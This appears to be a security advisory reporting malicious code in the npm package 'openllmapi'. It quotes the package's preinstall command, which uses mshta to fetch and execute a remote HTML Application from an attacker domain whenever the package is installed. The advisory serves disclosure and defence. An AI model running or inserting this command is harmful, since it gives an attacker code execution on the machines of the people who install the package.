—

MAL-2026-6364

Malicious code in openllmapi (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (9df5662b44b20595801c25919ac14689b71e89b8c1bdacceedc7ba1e9cf75c41) The package's preinstall lifecycle script (preinstall.js line 3) runs `cmd /c "mshta http://fixars.top"`, which causes Windows mshta.exe to download and execute an HTML Application from the attacker-controlled domain fixars.top over plain HTTP. This fires automatically on `npm install` and yields arbitrary code execution on the installer's machine with the user's privileges. The package metadata is consistent with a throwaway malicious publish: empty author, no repository or homepage, and a generic description ('Node.js wrapper for OpenLLM API service.') that does not match the install-time behavior.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / openllmapi

No fixed version published yet for openllmapi (npm). Pin to a known-safe version or switch to an alternative.

References

https://www.npmjs.com/package/openllmapi/v/4.0.2 [PACKAGE]